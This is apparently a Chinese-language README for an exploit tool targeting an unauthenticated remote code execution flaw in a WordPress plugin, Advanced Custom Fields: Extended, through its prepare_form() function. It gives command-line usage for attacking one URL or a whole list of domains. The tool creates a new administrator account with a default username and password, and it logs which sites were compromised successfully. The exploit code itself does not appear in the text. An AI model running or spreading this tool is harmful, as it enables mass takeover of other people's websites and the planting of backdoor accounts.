WordPress 的 Advanced Custom Fields: Extended 插件在 0.9.0.5 至 0.9.1.1 版本中存在远程代码执行漏洞,问题出在 prepare_form() 函数。该函数接受用户输入并将其传递给 call_user_func_array(),因而容易受到攻击。这使得未经认证的攻击者能够在服务器上执行任意代码,进而可用于注入后门或创建新的管理员用户账户。
从命令行运行脚本:
python CVE-2025-13486.py -l list.txt --email [email protected] --user new_user --password new_password
options:
-u, --url URL Single target WordPress site URL
-l yourlist.txt
File containing list of domains/URLs
--email, --email EMAIL
Email to set
--user USERNAME
Username to create (default: nemesis)
--password PASSWORD
Password to set (default: Warga@Sipil1337)
-o output.txt
Output file to save successful results (default: success_results.txt)